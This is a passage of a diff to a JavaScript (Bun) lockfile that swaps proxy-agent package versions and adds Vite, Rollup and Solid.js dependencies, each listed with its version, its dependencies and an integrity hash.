"sha512-dRB78srN/l6gqWulah9SrxeYnxeddIG30+GOqK/9OlLVyLg3HPnr6SqOWTWOXKRwC2eGYCkZ59NNuSgvSrpgOA=="], + "node-releases": ["node-releases@2.0.44", "", {}, "sha512-5WUyunoPMsvvEhS8AxHtRzP+oA8UCkJ7YRxatWKjngndhDGLiqEVAQKWjFAiAiuL8zMRGzGSJxFnLetoa43qGQ=="], "nth-check": ["nth-check@2.1.1", "", { "dependencies": { "boolbase": "^1.0.0" } }, "sha512-lqjrjmaOoAnWfMmBPL+XNnynZh2+swxiX3WUE0s4yEHI6m+AwrK2UZOimIRl3X/4QctVqS8AiZjFqyOGrMXb/w=="], @@ -1099,14 +1077,14 @@ "option": ["option@0.2.4", "", {}, "sha512-pkEqbDyl8ou5cpq+VsnQbe/WlEy5qS7xPzMS1U55OCG9KPvwFD46zDbxQIj3egJSFc3D+XhYOPUzz49zQAVy7A=="], - "p-retry": ["p-retry@4.6.2", "", { "dependencies": { "@types/retry": "0.12.0", "retry": "^0.13.1" } }, "sha512-312Id396EbJdvRONlngUx0NydfrIQ5lsYu0znKVUzVvArzEIt08V1qhtyESbGVd1FGX7UKtiFp5uwKZdM8wIuQ=="], + "pac-proxy-agent": ["pac-proxy-agent@7.2.0", "", { "dependencies": { "@tootallnate/quickjs-emscripten": "^0.23.0", "agent-base": "^7.1.2", "debug": "^4.3.4", "get-uri": "^6.0.1", "http-proxy-agent": "^7.0.0", "https-proxy-agent": "^7.0.6", "pac-resolver": "^7.0.1", "socks-proxy-agent": "^8.0.5" } }, "sha512-TEB8ESquiLMc0lV8vcd5Ql/JAKAoyzHFXaStwjkzpOpC5Yv+pIzLfHvjTSdf3vpa2bMiUQrg9i6276yn8666aA=="], - "pac-proxy-agent": ["pac-proxy-agent@9.0.1", "", { "dependencies": { "agent-base": "9.0.0", "debug": "^4.3.4", "get-uri": "8.0.0", "http-proxy-agent": "9.0.0", "https-proxy-agent": "9.0.0", "pac-resolver": "9.0.1", "quickjs-wasi": "^2.2.0", "socks-proxy-agent": "10.0.0" } }, "sha512-3ZOSpLboOlpW4yp8Cuv21KlTULRqyJ5Uuad3wXpSKFrxdNgcHEyoa22GRaZ2UlgCVuR6z+5BiavtYVvbajL/Yw=="], - - "pac-resolver": ["pac-resolver@9.0.1", "", { "dependencies": { "degenerator": "7.0.1", "netmask": "^2.0.2" }, "peerDependencies": { "quickjs-wasi": "^2.2.0" } }, "sha512-lJbS008tmkj08VhoM8Hzuv/VE5tK9MS0OIQ/7+s0lIF+BYhiQWFYzkSpML7lXs9iBu2jfmzBTLzhe9n6BX+dYw=="], + "pac-resolver": ["pac-resolver@7.0.1", "", { "dependencies": { "degenerator": "^5.0.0", "netmask": "^2.0.2" } }, "sha512-5NPgf87AT2STgwa2ntRMr45jTKrYBGkVU36yT0ig/n/GMAa3oPqhZfIQ2kMEimReg0+t9kZViDVZ83qfVUlckg=="], "pako": ["pako@1.0.11", "", {}, "sha512-4hLB8Py4zZce5s4yd9XzopqwVv/yGNhV1Bl8NTmCq1763HeK2+EwVTv+leGeL13Dnh2wfbqowVPXCIO0z4taYw=="], + "parse5": ["parse5@7.3.0", "", { "dependencies": { "entities": "^6.0.0" } }, "sha512-IInvU7fabl34qmi9gY8XOVxhYyMyuH2xUNpb2q8/Y+7552KlejkRvqvD19nMoUW/uQGGbqNpA6Tufu5FL5BZgw=="], + "partial-json": ["partial-json@0.1.7", "", {}, "sha512-Njv/59hHaokb/hRUjce3Hdv12wd60MtM9Z5Olmn+nehe0QDAsRtRbJPvJ0Z91TusF0SuZRIvnM+S4l6EIP8leA=="], "path-expression-matcher": ["path-expression-matcher@1.5.0", "", {}, "sha512-cbrerZV+6rvdQrrD+iGMcZFEiiSrbv9Tfdkvnusy6y0x0GKBXREFg/Y65GhIfm0tnLntThhzCnfKwp1WRjeCyQ=="], @@ -1127,18 +1105,14 @@ "progress": ["progress@2.0.3", "", {}, "sha512-7PiHtLll5LdnKIMw100I+8xJXR5gW2QwWYkT6iJva0bXitZKa/XMrSbdmg3r2Xnaidz9Qumd0VPaMrZlF9V9sA=="], - "protobufjs": ["protobufjs@7.5.8", "", { "dependencies": { "@protobufjs/aspromise": "^1.1.2", "@protobufjs/base64": "^1.1.2", "@protobufjs/codegen": "^2.0.5", "@protobufjs/eventemitter": "^1.1.0", "@protobufjs/fetch": "^1.1.0", "@protobufjs/float": "^1.0.2", "@protobufjs/inquire": "^1.1.1", "@protobufjs/path": "^1.1.2", "@protobufjs/pool": "^1.1.0", "@protobufjs/utf8": "^1.1.1", "@types/node": ">=13.7.0", "long": "^5.0.0" } }, "sha512-dvpCIeLPbXZS/Ete7yLaO7RenOdken2NHKykBXbsaGxZT0UTltcarBciw+A78SRQs9iMAAVpsYA+l8b1hTePIA=="], + "proxy-agent": ["proxy-agent@6.5.0", "", { "dependencies": { "agent-base": "^7.1.2", "debug": "^4.3.4", "http-proxy-agent": "^7.0.1", "https-proxy-agent": "^7.0.6", "lru-cache": "^7.14.1", "pac-proxy-agent": "^7.1.0", "proxy-from-env": "^1.1.0", "socks-proxy-agent": "^8.0.5" } }, "sha512-TmatMXdr2KlRiA2CyDu8GqR8EjahTG3aY3nXjdzFyoZbmB8hrBsTyMezhULIXKnC0jpfjlmiZ3+EaCzoInSu/A=="], - "proxy-agent": ["proxy-agent@8.0.1", "", { "dependencies": { "agent-base": "9.0.0", "debug": "^4.3.4", "http-proxy-agent": "9.0.0", "https-proxy-agent": "9.0.0", "lru-cache": "^7.14.1", "pac-proxy-agent": "9.0.1", "proxy-from-env": "^2.0.0", "socks-proxy-agent": "10.0.0" } }, "sha512-kccqGBqHZXR8onQhY/ganJjoO8QIKKRiFBhPOzbTZK16attzSZ/0XSmp9H7jrRxPKHjhGyx1q32lMPrJ3uLFgA=="], - - "proxy-from-env": ["proxy-from-env@2.1.0", "", {}, "sha512-cJ+oHTW1VAEa8cJslgmUZrc+sjRKgAKl3Zyse6+PV38hZe/V6Z14TbCuXcan9F9ghlz4QrFr2c92TNF82UkYHA=="], + "proxy-from-env": ["proxy-from-env@1.1.0", "", {}, "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg=="], "pump": ["pump@3.0.4", "", { "dependencies": { "end-of-stream": "^1.1.0", "once": "^1.3.1" } }, "sha512-VS7sjc6KR7e1ukRFhQSY5LM2uBWAUPiOPa/A3mkKmiMwSmRFUITt0xuj+/lesgnCv+dPIEYlkzrcyXgquIHMcA=="], "puppeteer-core": ["puppeteer-core@24.43.1", "", { "dependencies": { "@puppeteer/browsers": "2.13.2", "chromium-bidi": "14.0.0", "debug": "^4.4.3", "devtools-protocol": "0.0.1608973", "typed-query-selector": "^2.12.2", "webdriver-bidi-protocol": "0.4.1", "ws": "^8.20.0" } }, "sha512-T5ScUMAsmhdNbgDR41AGESYeS6V9MSgetkSnVhhW+gXvzC42VesKCn5ld87gAZDJ6vLHL9GkRvY9WtQWSnwFbw=="], - "quickjs-wasi": ["quickjs-wasi@2.2.0", "", {}, "sha512-zQxXmQMrEoD3S+jQdYsloq4qAuaxKFHZj6hHqOYGwB2iQZH+q9e/lf5zQPXCKOk0WJuAjzRFbO4KwHIp2D05Iw=="], - "react": ["react@19.2.5", "", {}, "sha512-llUJLzz1zTUBrskt2pwZgLq59AemifIftw4aB7JxOqf1HY2FDaGDxgwpAPVzHU1kdWabH7FauP4i1oEeer2WCA=="], "react-chartjs-2": ["react-chartjs-2@5.3.1", "", { "peerDependencies": { "chart.js": "^4.1.1", "react": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0" } }, "sha512-h5IPXKg9EXpjoBzUfyWJvllMjG2mQ4EiuHQFhms/AjUm0XSZHhyRy2xVmLXHKrtcdrPO4mnGqRtYoD0vp95A0A=="], @@ -1153,13 +1127,15 @@ "restore-cursor": ["restore-cursor@5.1.0", "", { "dependencies": { "onetime": "^7.0.0", "signal-exit": "^4.1.0" } }, "sha512-oMA2dcrw6u0YfxJQXm342bFKX/E4sG9rbTzO9ptUcR/e8A33cHuvStiYOwH7fszkZlZ1z/ta9AAoPk2F4qIOHA=="], - "retry": ["retry@0.13.1", "", {}, "sha512-XQBQ3I8W1Cge0Seh+6gjj03LbmRFWuoszgK9ooCpwYIrhhoO80pfq4cUkU5DkknwfOfFteRwlZ56PYOGYyFWdg=="], - "rfdc": ["rfdc@1.4.1", "", {}, "sha512-q1b3N5QkRUWUl7iyylaaj3kOpIT0N2i9MqIEQXP73GVsN9cw3fdx8X63cEmWhJGi2PPCF23Ijp7ktmd39rawIA=="], + "robomp-web": ["robomp-web@workspace:python/robomp/web"], + + "rollup": ["rollup@4.60.3", "", { "dependencies": { "@types/estree": "1.0.8" }, "optionalDependencies": { "@rollup/rollup-android-arm-eabi": "4.60.3", "@rollup/rollup-android-arm64": "4.60.3", "@rollup/rollup-darwin-arm64": "4.60.3", "@rollup/rollup-darwin-x64": "4.60.3", "@rollup/rollup-freebsd-arm64": "4.60.3", "@rollup/rollup-freebsd-x64": "4.60.3", "@rollup/rollup-linux-arm-gnueabihf": "4.60.3", "@rollup/rollup-linux-arm-musleabihf": "4.60.3", "@rollup/rollup-linux-arm64-gnu": "4.60.3", "@rollup/rollup-linux-arm64-musl": "4.60.3", "@rollup/rollup-linux-loong64-gnu": "4.60.3", "@rollup/rollup-linux-loong64-musl": "4.60.3", "@rollup/rollup-linux-ppc64-gnu": "4.60.3", "@rollup/rollup-linux-ppc64-musl": "4.60.3", "@rollup/rollup-linux-riscv64-gnu": "4.60.3", "@rollup/rollup-linux-riscv64-musl": "4.60.3", "@rollup/rollup-linux-s390x-gnu": "4.60.3", "@rollup/rollup-linux-x64-gnu": "4.60.3", "@rollup/rollup-linux-x64-musl": "4.60.3", "@rollup/rollup-openbsd-x64": "4.60.3", "@rollup/rollup-openharmony-arm64": "4.60.3", "@rollup/rollup-win32-arm64-msvc": "4.60.3", "@rollup/rollup-win32-ia32-msvc": "4.60.3", "@rollup/rollup-win32-x64-gnu": "4.60.3", "@rollup/rollup-win32-x64-msvc": "4.60.3", "fsevents": "~2.3.2" }, "bin": { "rollup": "dist/bin/rollup" } }, "sha512-pAQK9HalE84QSm4Po3EmWIZPd3FnjkShVkiMlz1iligWYkWQ7wHYd1PF/T7QZ5TVSD6uSTon5gBVMSM4JfBV+A=="], + "rss-parser": ["rss-parser@3.13.0", "", { "dependencies": { "entities": "^2.0.3", "xml2js": "^0.5.0" } }, "sha512-7jWUBV5yGN3rqMMj7CZufl/291QAhvrrGpDNE4k/02ZchL0npisiYYqULF71jCEKoIiHvK/Q2e6IkDwPziT7+w=="], - "safe-buffer": ["safe-buffer@5.2.1", "", {}, "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ=="], + "safe-buffer": ["safe-buffer@5.1.2", "", {}, "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g=="], "safe-stable-stringify": ["safe-stable-stringify@2.5.0", "", {}, "sha512-b3rppTKm9T+PsVCBEOUR46GWI7fdOs00VKZ1+9c1EWDaDMvjQc6tUwuFyIprgGgTcWoVHSKrU8H31ZHA2e0RHA=="], @@ -1171,6 +1147,10 @@ "semver": ["semver@7.8.0", "", { "bin": { "semver": "bin/semver.js" } }, "sha512-AcM7dV/5ul4EekoQ29Agm5vri8JNqRyj39o0qpX6vDF2GZrtutZl5RwgD1XnZjiTAfncsJhMI48QQH3sN87YNA=="], + "seroval": ["seroval@1.5.4", "", {}, "sha512-46uFvgrXTVxZcUorgSSRZ4y+ieqLLQRMlG4bnCZKW3qI6BZm7Rg4ntMW4p1mILEEBZWrFlcpp0AyIIlM6jD9iw=="], + + "seroval-plugins": ["seroval-plugins@1.5.4", "", { "peerDependencies": { "seroval": "^1.0" } }, "sha512-S0xQPhUTefAhNvNWFg0c1J8qJArHt5KdtJ/cFAofo06KD1MVSeFWyl4iiu+ApDIuw0WhjpOfCdgConOfAnLgkw=="], + "setimmediate": ["setimmediate@1.0.5", "", {}, "sha512-MATJdZp8sLqDl/68LfQmbP8zKPLQNV6BIZoIgrscFDQ+RsvK/BxeDQOgyxKKoh0y/8h3BqVFnCqQ/gd+reiIXA=="], "signal-exit": ["signal-exit@4.1.0", "", {}, "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw=="], @@ -1181,7 +1161,11 @@ "socks": ["socks@2.8.9", "", { "dependencies": { "ip-address": "^10.1.1", "smart-buffer": "^4.2.0" } }, "sha512-LJhUYUvItdQ0LkJTmPeaEObWXAqFyfmP85x0tch/ez9cahmhlBBLbIqDFnvBnUJGagb0JbIQrkBs1wJ+yRYpEw=="], - "socks-proxy-agent": ["socks-proxy-agent@10.0.0", "", { "dependencies": { "agent-base": "9.0.0", "debug": "^4.3.4", "socks": "^2.8.3" } }, "sha512-pyp2YR3mNxAMu0mGLtzs4g7O3uT4/9sQOLAKcViAkaS9fJWkud7nmaf6ZREFqQEi24IPkBcjfHjXhPTUWjo3uA=="], + "socks-proxy-agent": ["socks-proxy-agent@8.0.5", "", { "dependencies": { "agent-base": "^7.1.2", "debug": "^4.3.4", "socks": "^2.8.3" } }, "sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw=="], + + "solid-js": ["solid-js@1.9.12", "", { "dependencies": { "csstype": "^3.1.0", "seroval": "~1.5.0", "seroval-plugins": "~1.5.0" } }, "sha512-QzKaSJq2/iDrWR1As6MHZQ8fQkdOBf8GReYb7L5iKwMGceg7HxDcaOHk0at66tNgn9U2U7dXo8ZZpLIAmGMzgw=="], + + "solid-refresh": ["solid-refresh@0.6.3", "", { "dependencies": { "@babel/generator": "^7.23.6", "@babel/helper-module-imports": "^7.22.15", "@babel/types": "^7.23.6" }, "peerDependencies": { "solid-js": "^1.3" } }, "sha512-F3aPsX6hVw9ttm5LYlth8Q15x6MlI/J3Dn+o3EQyRTtTxidepSTwAYdozt01/YA+7ObcciagGEyXIopGZzQtbA=="], "source-map": ["source-map@0.6.1", "", {}, "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g=="], @@ -1251,9 +1235,15 @@ "universal-user-agent": ["universal-user-agent@7.0.3", "", {}, "sha512-TmnEAEAsBJVZM/AADELsK76llnwcf9vMKuPz8JflO1frO8Lchitr0fNaN9d+Ap0BjKtqWqd/J17qeDnXh8CL2A=="], + "update-browserslist-db": ["update-browserslist-db@1.2.3", "", { "dependencies": { "escalade": "^3.2.0", "picocolors": "^1.1.1" }, "peerDependencies": { "browserslist": ">= 4.21.0" }, "bin": { "update-browserslist-db": "cli.js" } }, "sha512-Js0m9cx+qOgDxo0eMiFGEueWztz+d4+M3rGlmKPT+T4IS/jP4ylw3Nwpu6cpTTP8R1MAC1kF4VbdLt3ARf209w=="], + "util-deprecate": ["util-deprecate@1.0.2", "", {}, "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw=="], - "web-streams-polyfill": ["web-streams-polyfill@3.3.3", "", {}, "sha512-d2JWLCivmZYTSIoge9MsgFCZrt571BikcWGYkjC1khllbTeDlGqZ2D8vD8E/lJa8WGWbb7Plm8/XJYV7IJHZZw=="], + "vite": ["vite@5.4.21", "", { "dependencies": { "esbuild": "^0.21.3", "postcss": "^8.4.43", "rollup": "^4.20.0" }, "optionalDependencies": { "fsevents": "~2.3.3" }, "peerDependencies": { "@types/node": "^18.0.0 || >=20.0.0", "less": "*", "lightningcss": "^1.21.0", "sass": "*", "sass-embedded": "*", "stylus": "*", "sugarss": "*", "terser": "^5.4.0" }, "optionalPeers": ["@types/node", "less", "lightningcss", "sass", "sass-embedded", "stylus", "sugarss", "terser"], "bin": { "vite": "bin/vite.js" } }, "sha512-o5a9xKjbtuhY6Bi5S3+HvbRERmouabWbyUcpXXUA1u+GNUKoROi9byOJ8M0nHbHYHkYICiMlqxkg1KkYmm25Sw=="], + + "vite-plugin-solid": ["vite-plugin-solid@2.11.12", "", { "dependencies": { "@babel/core": "^7.23.3", "@types/babel__core": "^7.20.4", "babel-preset-solid": "^1.8.4", "merge-anything": "^5.1.7", "solid-refresh": "^0.6.3", "vitefu": "^1.0.4" }, "peerDependencies": { "@testing-library/jest-dom": "^5.16.6 || ^5.17.0 || ^6.*", "solid-js": "^1.7.2", "vite": "^3.0.0 || ^4.0.0 || ^5.0.0 || ^6.0.0 || ^7.0.0 || ^8.0.0" }, "optionalPeers": ["@testing-library/jest-dom"] }, "sha512-FgjPcx2OwX9h6f28jli7A4bG7PP3te8uyakE5iqsmpq3Jqi1TWLgSroC9N6cMfGRU2zXsl4Q6ISvTr2VL0QHpA=="], + + "vitefu": ["vitefu@1.1.3", "", { "peerDependencies": { "vite": "^3.0.0 || ^4.0.0 || ^5.0.0 || ^6.0.0 || ^7.0.0 || ^8.0.0" }, "optionalPeers": ["vite"] }, "sha512-ub4okH7Z5KLjb6hDyjqrGXqWtWvoYdU3IGm/NorpgHncKoLTCfRIbvlhBm7r0YstIaQRYlp4yEbFqDcKSzXSSg=="], "webdriver-bidi-protocol": ["webdriver-bidi-protocol@0.4.1", "", {}, "sha512-ARrjNjtWRRs2w4Tk7nqrf2gBI0QXWuOmMCx2hU+1jUt6d00MjMxURrhxhGbrsoiZKJrhTSTzbIrc554iKI10qw=="], @@ -1281,6 +1271,8 @@ "y18n": ["y18n@5.0.8", "", {}, "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA=="], + "yallist": ["yallist@3.1.1", "", {}, "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g=="], + "yaml": ["yaml@2.9.0", "", { "bin": { "yaml": "bin.mjs" } }, "sha512-2AvhNX3mb8zd6Zy7INTtSpl1F15HW6Wnqj0srWlkKLcpYl/gMIMJiyuGq2KeI2YFxUPjdlB+3Lc10seMLtL4cA=="], "yargs": ["yargs@17.7.2", "", { "dependencies": { "cliui": "^8.0.1", "escalade": "^3.1.1", "get-caller-file": "^2.0.5", "require-directory": "^2.1.1", "string-width": "^4.2.3", "y18n": "^5.0.5", "yargs-parser": "^21.1.1" } }, "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w=="], @@ -1291,17 +1283,27 @@ "zod": ["zod@4.4.3", "", {}, "sha512-ytENFjIJFl2UwYglde2jchW2Hwm4GJFLDiSXWdTrJQBIN9Fcyp7n4DhxJEiWNAJMV1/BqWfW/kkg71UDcHJyTQ=="], - "@aws-crypto/sha256-browser/@smithy/util-utf8": ["@smithy/util-utf8@2.3.0", "", { "dependencies": { "@smithy/util-buffer-from": "^2.2.0", "tslib": "^2.6.2" } }, "sha512-R8Rdn8Hy72KKcebgLiv8jQcQkXoLMOGGv5uI1/k0l+snqkOzQ1R0ChUBCxWMlBsFMekWjq0wRudIweFs7sKT5A=="], + "@babel/core/semver": ["semver@6.3.1", "", { "bin": { "semver": "bin/semver.js" } }, "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA=="], - "@aws-crypto/util/@smithy/util-utf8": ["@smithy/util-utf8@2.3.0", "", { "dependencies": { "@smithy/util-buffer-from": "^2.2.0", "tslib": "^2.6.2" } }, "sha512-R8Rdn8Hy72KKcebgLiv8jQcQkXoLMOGGv5uI1/k0l+snqkOzQ1R0ChUBCxWMlBsFMekWjq0wRudIweFs7sKT5A=="], + "@babel/helper-compilation-targets/lru-cache": ["lru-cache@5.1.1", "", { "dependencies": { "yallist": "^3.0.2" } }, "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w=="], - "@aws-sdk/credential-provider-sso/@aws-sdk/token-providers": ["@aws-sdk/token-providers@3.1041.0", "", { "dependencies": { "@aws-sdk/core": "^3.974.8", "@aws-sdk/nested-clients": "^3.997.6", "@aws-sdk/types": "^3.973.8", "@smithy/property-provider": "^4.2.14", "@smithy/shared-ini-file-loader": "^4.4.9", "@smithy/types": "^4.14.1", "tslib": "^2.6.2" } }, "sha512-Th7kPI6YPtvJUcdznooXJMy+9rQWjmEF81LxaJssngBzuysK4a/x+l8kjm1zb7nYsUPbndnBdUnwng/3PLvtGw=="], - - "@aws-sdk/xml-builder/fast-xml-parser": ["fast-xml-parser@5.7.2", "", { "dependencies": { "@nodable/entities": "^2.1.0", "fast-xml-builder": "^1.1.5", "path-expression-matcher": "^1.5.0", "strnum": "^2.2.3" }, "bin": { "fxparser": "src/cli/cli.js" } }, "sha512-P7oW7tLbYnhOLQk/Gv7cZgzgMPP/XN03K02/Jy6Y/NHzyIAIpxuZIM/YqAkfiXFPxA2CTm7NtCijK9EDu09u2w=="], + "@babel/helper-compilation-targets/semver": ["semver@6.3.1", "", { "bin": { "semver": "bin/semver.js" } }, "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA=="], "@octokit/request/content-type": ["content-type@2.0.0", "", {}, "sha512-j/O/d7GcZCyNl7/hwZAb606rzqkyvaDctLmckbxLzHvFBzTJHuGEdodATcP3yIRoDrLHkIATJuvzbFlp/ki2cQ=="], - "@puppeteer/browsers/proxy-agent": ["proxy-agent@6.5.0", "", { "dependencies": { "agent-base": "^7.1.2", "debug": "^4.3.4", "http-proxy-agent": "^7.0.1", "https-proxy-agent": "^7.0.6", "lru-cache": "^7.14.1", "pac-proxy-agent": "^7.1.0", "proxy-from-env": "^1.1.0", "socks-proxy-agent": "^8.0.5" } }, "sha512-TmatMXdr2KlRiA2CyDu8GqR8EjahTG3aY3nXjdzFyoZbmB8hrBsTyMezhULIXKnC0jpfjlmiZ3+EaCzoInSu/A=="], + "@tailwindcss/oxide-wasm32-wasi/@emnapi/core": ["@emnapi/core@1.10.0", "", { "dependencies": { "@emnapi/wasi-threads": "1.2.1", "tslib": "^2.4.0" }, "bundled": true }, "sha512-yq6OkJ4p82CAfPl0u9mQebQHKPJkY7WrIuk205cTYnYe+k2Z8YBh11FrbRG/H6ihirqcacOgl2BIO8oyMQLeXw=="], + + "@tailwindcss/oxide-wasm32-wasi/@emnapi/runtime": ["@emnapi/runtime@1.10.0", "", { "dependencies": { "tslib": "^2.4.0" }, "bundled": true }, "sha512-ewvYlk86xUoGI0zQRNq/mC+16R1QeDlKQy21Ki3oSYXNgLb45GV1P6A0M+/s6nyCuNDqe5VpaY84BzXGwVbwFA=="], + + "@tailwindcss/oxide-wasm32-wasi/@emnapi/wasi-threads": ["@emnapi/wasi-threads@1.2.1", "", { "dependencies": { "tslib": "^2.4.0" }, "bundled": true }, "sha512-uTII7OYF+/Mes/MrcIOYp5yOtSMLBWSIoLPpcgwipoiKbli6k322tcoFsxoIIxPDqW01SQGAgko4EzZi2BNv2w=="], + + "@tailwindcss/oxide-wasm32-wasi/@napi-rs/wasm-runtime": ["@napi-rs/wasm-runtime@1.1.4", "", { "dependencies": { "@tybys/wasm-util": "^0.10.1" }, "peerDependencies": { "@emnapi/core": "^1.7.1", "@emnapi/runtime": "^1.7.1" }, "bundled": true }, "sha512-3NQNNgA1YSlJb/kMH1ildASP9HW7/7kYnRI2szWJaofaS1hWmbGI4H+d3+22aGzXXN9IJ+n+GiFVcGipJP18ow=="], + + "@tailwindcss/oxide-wasm32-wasi/@tybys/wasm-util": ["@tybys/wasm-util@0.10.2", "", { "dependencies": { "tslib": "^2.4.0" }, "bundled": true }, "sha512-RoBvJ2X0wuKlWFIjrwffGw1IqZHKQqzIchKaadZZfnNpsAYp2mM0h36JtPCjNDAHGgYez/15uMBpfGwchhiMgg=="], + + "@tailwindcss/oxide-wasm32-wasi/tslib": ["tslib@2.8.1", "", { "bundled": true }, "sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w=="], + + "babel-plugin-jsx-dom-expressions/@babel/helper-module-imports": ["@babel/helper-module-imports@7.18.6", "", { "dependencies": { "@babel/types": "^7.18.6" } }, "sha512-0NFvs3VkuSYbFi1x2Vd6tKrywq+z/cLeYC/RJNFrIX/30Bf5aiGYbtvGXolEktzJH8o5E5KJ3tT+nkxuuZFVlA=="], "chromium-bidi/zod": ["zod@3.25.76", "", {}, "sha512-gzUt/qt81nXsFGKIFcC3YnfEAx5NkunCfnDlvuBSSFS02bcXu4Lmea0AFIUwbLWxWPx3d9p8S5QoaujKcNQxcQ=="], @@ -1313,50 +1315,34 @@ "dom-serializer/entities": ["entities@4.5.0", "", {}, "sha512-V0hjH4dGPh9Ao5p0MoRY6BVqtwCjhz6vI5LT8AJ55H+4g9/4vbHx1I54fS0XuclLhDHArPQCiMjDxjaL8fPxhw=="], - "gaxios/https-proxy-agent": ["https-proxy-agent@7.0.6", "", { "dependencies": { "agent-base": "^7.1.2", "debug": "4" } }, "sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw=="], - "js-yaml/argparse": ["argparse@2.0.1", "", {}, "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q=="], "jszip/readable-stream": ["readable-stream@2.3.8", "", { "dependencies": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA=="], "log-update/slice-ansi": ["slice-ansi@7.1.2", "", { "dependencies": { "ansi-styles": "^6.2.1", "is-fullwidth-code-point": "^5.0.0" } }, "sha512-iOBWFgUX7caIZiuutICxVgX1SdxwAVFFKwt1EvMYYec/NWO5meOJ6K5uQxhrYBdQJne4KxiqZc+KptFOWFSI9w=="], - "node-fetch/data-uri-to-buffer": ["data-uri-to-buffer@4.0.1", "", {}, "sha512-0R9ikRb668HB7QDxT1vkpuUBtqc53YyAwMwGeUFKRojY/NWKvdZ+9UYtRfGmhqNbRkTSVpMbmyhXipFFv2cb/A=="], + "parse5/entities": ["entities@6.0.1", "", {}, "sha512-aN97NXWF6AWBTahfVOIrB/NShkzi5H7F9r1s9mD3cDj4Ko5f2qhhVoYMibXF7GlLveb/D2ioWay8lxI97Ven3g=="], "proxy-agent/lru-cache": ["lru-cache@7.18.3", "", {}, "sha512-jumlc0BIUrS3qJGgIkWZsyfAM7NCWiBcCDhnd+3NNM5KbBmLTgHVfWBcg6W+rLUsIpzpERPsvwUP7CckAQSOoA=="], + "robomp-web/typescript": ["typescript@5.9.3", "", { "bin": { "tsc": "bin/tsc", "tsserver": "bin/tsserver" } }, "sha512-jl1vZzPDinLr9eUt3J/t7V6FgNEw9QjvBPdysz9KfQDD41fQrC2Y4vKQdiaUpFT4bXlb1RHhLpp8wtm6M5TgSw=="], + "rss-parser/entities": ["entities@2.2.0", "", {}, "sha512-p92if5Nz619I0w+akJrLZH0MX0Pb5DX39XOwQTtXSdQQOaYH03S1uIQp4mhOZtAXrxq4ViO67YTiLBo2638o9A=="], "slice-ansi/is-fullwidth-code-point": ["is-fullwidth-code-point@5.1.0", "", { "dependencies": { "get-east-asian-width": "^1.3.1" } }, "sha512-5XHYaSyiqADb4RnZ1Bdad6cPp8Toise4TzEjcOYDHZkTCbKgiUl7WTUCpNWHuxmDt91wnsZBc9xinNzopv3JMQ=="], "string-width/strip-ansi": ["strip-ansi@6.0.1", "", { "dependencies": { "ansi-regex": "^5.0.1" } }, "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A=="], + "string_decoder/safe-buffer": ["safe-buffer@5.2.1", "", {}, "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ=="], + "wrap-ansi/string-width": ["string-width@7.2.0", "", { "dependencies": { "emoji-regex": "^10.3.0", "get-east-asian-width": "^1.0.0", "strip-ansi": "^7.1.0" } }, "sha512-tsaTIkKW9b4N+AEj+SVA+WhJzV7/zMhcSu78mLKWSk7cXMOSHsBKFWUs0fWwq8QyK3MgJBQRX6Gbi4kYbdvGkQ=="], "xml2js/xmlbuilder": ["xmlbuilder@11.0.1", "", {}, 